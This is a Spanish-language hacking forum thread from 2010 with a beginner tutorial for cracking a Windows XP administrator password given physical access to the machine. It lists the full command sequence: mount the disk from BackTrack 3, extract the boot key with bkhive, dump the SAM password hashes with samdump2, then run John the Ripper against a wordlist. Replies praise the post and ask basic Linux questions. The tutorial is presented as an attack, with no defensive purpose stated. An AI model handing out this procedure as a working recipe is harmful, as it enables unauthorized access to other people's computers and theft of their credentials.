comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Crackear password de administrador en windows usando Backtrack 3

  • 3 Respuestas
  • 3095 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Devilboy

  • *
  • Underc0der
  • Mensajes: 328
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Marzo 10, 2010, 11:40:03 am »
Bueno se ke ya existe mucha info sobre esto, pero bueno un poco mas no hace daño a nadie.
Ademas este tuto va enfocado a los novatos, bueno espero ke les guste y perdonen si no pongo capturas pero lo hice de rapido, ademàs creo ke kedarà muy entendible apesar de no usar imagenes y pues cualkier duda pueden preguntar.

Herramientas:

1)Una pc con windows xp, funciona tmb para versiones mas viejitas, en vista la vdd no se si funcione pues no lo he probado pero me imagino ke si

2)Acceso fisico a la pc

3)Una distribucion de linux, en mi caso usarè mi buen amigo backtrack 3.
Uso backtrack xq ya trae muchas herramientas de crackeo instaladas pero da igual la ke usen

empezàmos por abrir una consola de bt3

y tecleamos lo sig:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
ls /mnt/hda1

en mi caso es hda1 pero en el de uds puede variar un poco, puede ser sda1, sda2, hda2, etc

y nos desplegarà algo como esto:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
bt ~ # ls /mnt/hda1
AUTOEXEC.BAT*              IO.SYS*                       boot.ini*
AppServ/                   MSDOS.SYS*                    datos.sql*
Archivos\ de\ programa/    NTDETECT.COM*                 eclipse/
Bootfont.bin*              RECYCLER/                     ntldr*
CONFIG.SYS*                Sun/                          pagefile.sys*
Config.Msi/                System\ Volume\ Information/  xampp/
Documents\ and\ Settings/  WINDOWS/

estos son los archivos ke tengo en mi pc, en mi disco duro C:/, obviamente en el de uds va a cambiar

procedemos a crear una carpeta:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
mkdir /crack
cd /crack

Ahora ke ya estàmos dentro de /crack

ahora vamos a extraer la boot key y guardarla en un archivo .txt llamado bootkey.txt:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
bkhive /mnt/hda1/WINDOWS/system32/config/system bootkey.txt

les tiene ke aparecer algo parecido a esto:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
Bootkey: 5da3c4796d09d5ca929d8498c6af87c9
Ahora vamos a extraer el hash del archivo SAM y guardarlo como hash.txt:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta

samdump2 /mnt/hda1/WINDOWS/system32/config/SAM bootkey.txt >hash.txt

Una vez hecho esto ya tenemos el contenido del archivo SAM que es donde se encuentran los passwords en hash.txt. ahora vamos a crackearlo.

para esto usarèmos un diccionario  y john the ripper

necesitàmos tener el diccionario en la misma carpeta donde estàmos (crack)
recuerden ke un diccionario no es mas ke un archivo de texto ke contiene varias palabras (posibles passwords).

Bien una vez ke ya tenèmos el diccionario (words.txt) tecleamos lo sig para crackear el hash:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
john hash.txt -f:NT -w:words.txt

y nos darà el password del windows

recordèmos ke si el password no està en el diccionario, pues entonces es imposible crackearlo

por eso para ke este atake funcione necesitamos tener un buen diccionario

cualkier duda aki estoy

salu2

Devilboy


Veo Una Energia Que Con Deceo de Justicia... Veo Mas Alla de LAs Letras Escritas...
Veo Un Hacktivismo Puro... Nacido De lo Mas Profundo De un Corazon..
Con La Mirada Firme En Defender Mis Ideales...


Desconectado ||•?¤?- SeCurity-?¤?•||

  • *
  • Underc0der
  • Mensajes: 63
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #1 en: Marzo 23, 2010, 05:54:02 pm »

    salu2 !! buen aporte

Desconectado _lerie_

  • *
  • Underc0der
  • Mensajes: 19
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #2 en: Marzo 23, 2010, 07:16:31 pm »
como se abre la consola de linux? la verdad nunca e usado linux

Desconectado ||•?¤?- SeCurity-?¤?•||

  • *
  • Underc0der
  • Mensajes: 63
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #3 en: Marzo 24, 2010, 12:46:31 am »
en linux esta siempre en su barra de tareas !! te recomiendo que comienses con linux ubuntu

 

¿Te gustó el post? COMPARTILO!



Sniffer para windows "RawCap"

Iniciado por s747ik

Respuestas: 1
Vistas: 2122
Último mensaje Junio 12, 2011, 04:08:03 pm
por staRgan
Linux v.s Windows. ¿Cual es mejor para hacking.?

Iniciado por Cl0udswX

Respuestas: 12
Vistas: 4435
Último mensaje Abril 05, 2014, 08:01:32 pm
por Cl0udswX
Hackear servidor windows (ACTUALIZADO) + Cambiar DNS - By Ixidion13

Iniciado por Stiuvert

Respuestas: 0
Vistas: 2801
Último mensaje Abril 26, 2011, 06:05:06 pm
por Stiuvert
Como entrar en una maquina windows con recursos compartidos.

Iniciado por ANTRAX

Respuestas: 1
Vistas: 2500
Último mensaje Febrero 18, 2010, 02:27:46 pm
por OSX
Obtener GUI tras explotar Windows XP con Metasploit y meterpreter

Iniciado por Jimeno

Respuestas: 4
Vistas: 3526
Último mensaje Febrero 16, 2013, 05:41:53 pm
por ANTRAX